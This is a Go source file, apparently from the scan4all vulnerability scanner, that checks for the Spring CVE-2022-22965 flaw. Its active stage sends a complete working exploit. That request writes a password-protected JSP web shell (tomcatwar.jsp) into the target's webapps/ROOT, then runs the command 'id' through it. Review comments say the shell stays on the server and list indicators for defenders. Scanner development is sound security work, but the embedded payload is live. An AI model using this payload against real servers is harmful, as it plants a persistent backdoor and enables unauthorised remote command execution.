package Springboot

import (
	"github.com/GhostTroops/scan4all/lib/socket"
	"github.com/GhostTroops/scan4all/lib/util"
	"net/url"
	"strings"
)

// CVE_2022_22965 reports whether the target at u appears vulnerable to
// CVE-2022-22965 (Spring "class.module.classLoader" data-binding issue).
//
// The check runs in two stages:
//  1. Fingerprint: two plain GET requests against scheme://host. The first
//     sets class.module.classLoader[1]=1 and is expected to answer HTTP 500;
//     the second sets class.module.classLoader=1 and is expected to answer
//     HTTP 200. If both match, true is returned and nothing further is sent.
//  2. Active check over a raw TCP exchange: a GET whose query parameters set
//     class.module.classLoader.resources.context.parent.pipeline.first.
//     {pattern,suffix,directory,prefix,fileDateFormat}, directing output to
//     webapps/ROOT with prefix "tomcatwar" and suffix ".jsp", followed by a
//     request for /tomcatwar.jsp?pwd=j&cmd=id. true is returned when that
//     response contains both "uid=" and "gid=", after reporting the finding
//     through util.SendLog.
//
// NOTE(review): stage 2 is not a passive probe. When it succeeds the target is
// left with a tomcatwar.jsp file that this function never removes, and the
// command "id" has been executed on the host. Operators running this scanner
// should expect that artifact to persist; defenders can treat a tomcatwar.jsp
// under webapps/ROOT, or access-log entries containing
// "class.module.classLoader", as an indicator that this check (or a real
// attack using the same technique) has been run against the server.
//
// A URL parse failure, an empty host, or non-matching responses yield false.
func CVE_2022_22965(u string) bool {
	// Only the scheme and host of u are used; any path or query is dropped.
	if oU, err := url.Parse(u); nil == err && oU.Host != "" {
		szUrl := oU.Scheme + "://" + oU.Host
		// Stage 1: status-code fingerprint using plain GET requests.
		// (The trailing false/nil arguments are util.HttpRequset options whose
		// meaning is not visible in this file.)
		if req, err := util.HttpRequset(szUrl+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
			if req.StatusCode == 500 {
				if req2, err := util.HttpRequset(szUrl+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
					if req2.StatusCode == 200 {
						return true
					}
				}
			}
		}

		// Fingerprint did not match (or a request failed): fall through to the
		// active check. The third argument (50) is presumably a timeout —
		// confirm against socket.NewCheckTarget.
		cc := socket.NewCheckTarget(u, "tcp", 50)
		defer cc.Close()
		// First send: the request that is meant to create tomcatwar.jsp on the
		// target. Its response is discarded; success is judged solely by the
		// follow-up request below. Line endings are normalised to CRLF.
		cc.SendPayload([]byte(strings.ReplaceAll(`GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: `+oU.Host+`
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

`, "\n", "\r\n")), 1)
		// Second send through the same CheckTarget: request the file the
		// previous request was meant to create and run "id" through it.
		s1 := cc.SendPayload([]byte(strings.ReplaceAll(`GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1
Host: `+oU.Host+`
Connection: close

`, "\n", "\r\n")), 1)
		// "uid=" and "gid=" together are taken as the output of id, i.e. the
		// command ran on the target; log it as an RCE finding.
		if strings.Contains(s1, "uid=") && strings.Contains(s1, "gid=") {
			util.SendLog(oU.Scheme+"://"+oU.Host+"/tomcatwar.jsp?pwd=j&cmd=id", "Springboot", "RCE", "")
			return true
		}
	}
	return false
}
